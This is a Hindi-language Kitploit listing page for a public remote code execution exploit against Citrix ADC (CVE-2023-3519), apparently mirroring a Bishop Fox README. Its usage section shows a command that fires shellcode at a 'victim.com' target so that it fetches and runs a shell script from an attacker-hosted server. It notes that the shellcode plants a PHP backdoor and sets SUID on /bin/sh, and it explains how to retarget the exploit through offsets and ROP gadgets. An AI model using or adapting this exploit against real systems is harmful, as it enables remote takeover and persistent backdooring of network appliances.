Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-3519 — CVE-2023-3519 के लिए RCE एक्सप्लॉइट | Kitploit
उपकरण/GitHubGitHub/bishopfox/cve-2023-3519
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubbishopfox/cve-2023-3519

CVE-2023-3519

CVE-2023-3519 के लिए RCE एक्सप्लॉइट

रिपॉजिटरी देखें
228432 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Citrix ADC RCE CVE-2023-3519

यह एक्सप्लॉइट Citrix VPX 13.1-48.47 के लिए पतों और शेलकोड का उपयोग करता है। पूर्ण विवरण के लिए, यहाँ क्लिक करें।

उपयोग

शेलकोड बनाने के लिए NASM आवश्यक है।

root@kitploit:~
$ sudo apt install nasm

शामिल शेलकोड एक दूरस्थ http(s) सर्वर से शेल स्क्रिप्ट डाउनलोड करके चलाएगा। स्क्रिप्ट 3 तर्क लेती है: लक्ष्य होस्ट, लक्ष्य पोर्ट, और शेल स्क्रिप्ट पेलोड का URL. एक उदाहरण पेलोड जो स्वयं को साफ करने से पहले id और uname -a चलाता है, इस रिपॉजिटरी में शामिल है।

root@kitploit:~
$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

URL शेलकोड बफर में फिट होने के लिए पर्याप्त छोटा होना चाहिए, और यदि यह बहुत लंबा है तो आपको चेतावनी मिलेगी।

शेलकोड आर्टिफैक्ट

शेलकोड /var/netscaler/logon/a.php में एक PHP बैकडोर बनाएगा और /bin/sh पर SUID बिट सेट करेगा। शामिल sh पेलोड इन आर्टिफैक्ट्स को स्वचालित रूप से साफ करने का एक उदाहरण दिखाता है। यह भी ध्यान दें कि शेलकोड अपने फ़ाइल डिस्क्रिप्टर को बंद नहीं करता है, इसलिए बार-बार अत्यधिक शोषण से संसाधन समाप्ति हो सकती है।

अन्य संस्करणों के लिए अनुकूलन

FreeBSD-आधारित Citrix लक्ष्यों के लिए, आपको केवल 3 मान खोजने की आवश्यकता होनी चाहिए: सहेजे गए रिटर्न पॉइंटर का ऑफसेट, एक jmp rsp ROP गैजेट (या इसके समतुल्य, जैसे push rsp; ret;), और क्रैश से बचने के लिए कूदने का पता। ये पैरामीटर सभी cve-2023-3519.py के शीर्ष के पास हार्डकोडेड हैं। कुछ संस्करणों के लिए आपको RBP मान को ठीक करने के लिए चौथा मान भी खोजने की आवश्यकता हो सकती है, क्योंकि कंपाइलर सहेजे गए रजिस्टरों को पुनर्स्थापित करने के लिए POP निर्देशों के बजाय RBP-सापेक्ष लोड उत्पन्न करता है।

टूल डाउनलोड करें